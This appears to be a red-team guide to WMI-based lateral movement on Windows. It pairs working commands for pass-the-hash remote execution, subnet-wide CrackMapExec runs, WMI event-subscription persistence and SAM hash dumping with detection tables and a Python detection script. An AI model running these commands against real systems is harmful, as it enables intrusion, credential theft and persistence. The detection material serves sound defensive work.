Perform lateral movement across Windows networks using WMI-based remote execution techniques including Impacket wmiexec.py, CrackMapExec, and native WMI commands for stealthy post-exploitation during red team engagements.
WMI (Windows Management Instrumentation) is a legitimate Windows administration framework that red teams abuse for lateral movement because it provides remote command execution without installing a service on the target, so it leaves fewer obvious artifacts than PsExec. Impacket's wmiexec.py builds a semi-interactive shell over WMI by invoking Win32_Process.Create for each command, redirecting the command's output to a temporary file in the ADMIN$ share and reading that file back over SMB. Because no service is installed, WMIExec is stealthier than PsExec and less likely to trigger service-installation alerts, although the output file on ADMIN$ and the WmiPrvSE.exe process tree remain detectable. WMI-based lateral movement maps to MITRE ATT&CK T1047 (Windows Management Instrumentation) and is used by threat actors including APT29, APT32, and Lazarus Group.
```bash
# With cleartext password
wmiexec.py domain.local/admin:'Password123'@10.10.10.50
# With NT hash (Pass-the-Hash)
wmiexec.py -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 domain.local/admin@10.10.10.50
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass domain.local/admin@10.10.10.50
# Execute specific command (non-interactive)
wmiexec.py domain.local/admin:'Password123'@10.10.10.50 "ipconfig /all"
# Using dcomexec.py as alternative (MMC20.Application DCOM object)
dcomexec.py -object MMC20 domain.local/admin:'Password123'@10.10.10.50
# Using ShellWindows DCOM object
dcomexec.py -object ShellWindows domain.local/admin:'Password123'@10.10.10.50
```

```bash
# Execute single command on subnet
crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123' -x "whoami"
# Execute with hash
crackmapexec wmi 10.10.10.0/24 -u admin -H a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -x "ipconfig"
# Execute PowerShell command
crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123' -X "Get-Process"
# Check local admin access via WMI
crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123'
```
```cmd
:: Using wmic.exe (deprecated but still available)
wmic /node:10.10.10.50 /user:domain\admin /password:Password123 process call create "cmd.exe /c whoami > C:\temp\out.txt"
```
```powershell
# Using PowerShell Invoke-WmiMethod
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 10.10.10.50 `
    -Credential $cred -ArgumentList "cmd.exe /c ipconfig > C:\temp\output.txt"
# Using CIM sessions (the CIM cmdlets are the modern replacement for the WMI cmdlets)
$session = New-CimSession -ComputerName 10.10.10.50 -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process `
    -MethodName Create -Arguments @{CommandLine="cmd.exe /c whoami"}
# Execute encoded PowerShell command remotely (-enc expects Base64 of UTF-16LE)
$cmd = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Process | Out-File C:\temp\procs.txt'))
Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 10.10.10.50 `
    -Credential $cred -ArgumentList "powershell.exe -enc $cmd"
# Create a permanent WMI event subscription. Note that this filter polls
# Win32_PerfFormattedData_PerfOS_System every 60 seconds, so the consumer fires
# repeatedly while the system is up, not only at logon.
$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter `
    -Arguments @{Name="PersistFilter"; EventNamespace="root\cimv2";
    QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer `
    -Arguments @{Name="PersistConsumer"; CommandLineTemplate="cmd.exe /c <payload>"}
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding `
    -Arguments @{Filter=$filter; Consumer=$consumer}
```
```bash
# Dump SAM hashes via WMI + reg save
wmiexec.py domain.local/admin:'Password123'@10.10.10.50 "reg save HKLM\SAM C:\temp\sam && reg save HKLM\SYSTEM C:\temp\system"
# Download saved hives (smbclient.py takes a share, then a path relative to it)
smbclient.py domain.local/admin:'Password123'@10.10.10.50
> use C$
> cd temp
> get sam
> get system
# Extract hashes from saved hives
secretsdump.py -sam sam -system system LOCAL
```

| Tool | Purpose | Platform |
|---|---|---|
| wmiexec.py | Semi-interactive WMI shell (Impacket) | Linux (Python) |
| dcomexec.py | DCOM-based remote execution (Impacket) | Linux (Python) |
| CrackMapExec | Multi-target WMI execution | Linux (Python) |
| wmic.exe | Native Windows WMI command-line tool | Windows |
| PowerShell CIM | Modern WMI cmdlets | Windows |
| SharpWMI | .NET WMI execution tool | Windows (.NET) |

| Method | Service Created | Output Method | Stealth Level |
|---|---|---|---|
| wmiexec.py | No | Temp file on ADMIN$ | Medium |
| dcomexec.py | No | Temp file on ADMIN$ | Medium-High |
| wmic.exe | No | None (blind) or redirect | Medium |
| PowerShell WMI | No | None (blind) or redirect | High |
| PsExec (comparison) | Yes | Service output pipe | Low |

| Indicator | Detection Method |
|---|---|
| Win32_Process.Create WMI calls | Event 4688 (or Sysmon Event 1) where the parent process is WmiPrvSE.exe |
| WMI temporary output files on ADMIN$ | File monitoring on ADMIN$ share for temp files |
| Remote WMI connections (DCOM/135) | Network monitoring for DCOM traffic to workstations |
| WmiPrvSE.exe spawning cmd.exe/powershell.exe | EDR process tree analysis |
| Event 5857/5860/5861 | Microsoft-Windows-WMI-Activity/Operational log (5857: provider loaded, 5860: temporary event consumer registered, 5861: permanent event consumer registered) |
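
The detection table above, together with the permanent event subscription shown earlier, as an added example (not code from the original page or from any of the tools it lists): a small Python rule set run over constructed process-creation and WMI-Activity records. It flags interpreters spawned by WmiPrvSE.exe, escalates when the command line carries the `1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1` redirection that wmiexec.py uses to collect output, and flags Event 5861 records that bind a filter to a command-executing consumer. Assumptions: the dict field names follow Sysmon's schema (`ParentImage`, `Image`, `CommandLine`, `Computer`), the 5861 message text is modelled on the WMI-Activity log format, and conversion of real EVTX records into these dicts happens upstream.

```python
"""Detection rules for WMI-based remote execution (T1047) and WMI
event-subscription persistence (T1546.003), run over constructed records.

Added example, not code from the original page or from Impacket/CrackMapExec.
Records mimic Sysmon Event 1 / Security 4688 fields and a
Microsoft-Windows-WMI-Activity/Operational Event 5861 message; parsing real
EVTX into these dicts is assumed to happen upstream.
"""
import re
from dataclasses import dataclass

# Interpreters typically spawned by WmiPrvSE.exe during remote command execution
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}

# wmiexec.py redirects each command's output to a temp file on the target's own
# ADMIN$ share, e.g.  cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1
WMIEXEC_OUTPUT_RE = re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(?:\.\d+)?", re.IGNORECASE)

# Consumer classes that run arbitrary commands or scripts when a filter fires
EXEC_CONSUMER_RE = re.compile(r"\b(CommandLineEventConsumer|ActiveScriptEventConsumer)\b", re.IGNORECASE)


@dataclass
class Alert:
    rule: str      # MITRE ATT&CK technique the rule maps to
    host: str      # Computer field of the originating record
    severity: str  # "high" or "critical"
    detail: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_event(ev: dict) -> list:
    """Flag interpreters spawned by WmiPrvSE.exe; escalate to critical when the
    command line carries wmiexec.py's ADMIN$ output redirection."""
    alerts = []
    if _basename(ev.get("ParentImage", "")) != "wmiprvse.exe":
        return alerts
    child = _basename(ev.get("Image", ""))
    cmdline = ev.get("CommandLine", "")
    if child in SUSPICIOUS_CHILDREN:
        if WMIEXEC_OUTPUT_RE.search(cmdline):
            alerts.append(Alert("T1047", ev["Computer"], "critical",
                                f"wmiexec.py-style output redirection to ADMIN$: {cmdline}"))
        else:
            alerts.append(Alert("T1047", ev["Computer"], "high",
                                f"{child} spawned by WmiPrvSE.exe: {cmdline}"))
    return alerts


def check_wmi_activity_event(ev: dict) -> list:
    """Flag Event 5861 records that bind a filter to a command-executing consumer."""
    alerts = []
    if ev.get("EventID") == 5861 and EXEC_CONSUMER_RE.search(ev.get("Message", "")):
        alerts.append(Alert("T1546.003", ev["Computer"], "high",
                            f"permanent WMI consumer registered: {ev['Message']}"))
    return alerts


def detect(events: list) -> list:
    """Route each record to the rule set for its source and collect alerts."""
    alerts = []
    for ev in events:
        if ev.get("Source") == "process":
            alerts.extend(check_process_event(ev))
        elif ev.get("Source") == "wmi-activity":
            alerts.extend(check_wmi_activity_event(ev))
    return alerts


# Constructed sample records (not real telemetry); field names follow Sysmon's schema.
SAMPLE_EVENTS = [
    {"Source": "process", "Computer": "WS01", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1700000000.1234 2>&1"},
    {"Source": "process", "Computer": "WS02", "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc <base64-utf16le-blob>"},
    {"Source": "process", "Computer": "WS03", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
    {"Source": "wmi-activity", "Computer": "WS01", "EventID": 5857,
     "Message": "Win32_Process provider started with result code 0x0."},
    {"Source": "wmi-activity", "Computer": "WS01", "EventID": 5861,
     "Message": 'Namespace = //./root/subscription; Eventfilter = PersistFilter (refer to its activate eventid:5859); '
                'Consumer = CommandLineEventConsumer="PersistConsumer"; PossibleCause = Binding EventFilter'},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a.severity.upper()}] {a.host} {a.rule}: {a.detail}")
```

Run as-is to see the three alerts from the sample set: the wmiexec.py redirection is rated critical because the `\\127.0.0.1\ADMIN$\__` path is specific to that tool, while a plain interpreter under WmiPrvSE.exe stays at high since legitimate administration via Invoke-WmiMethod or CIM sessions produces the same parent/child pair and needs triage against expected admin activity.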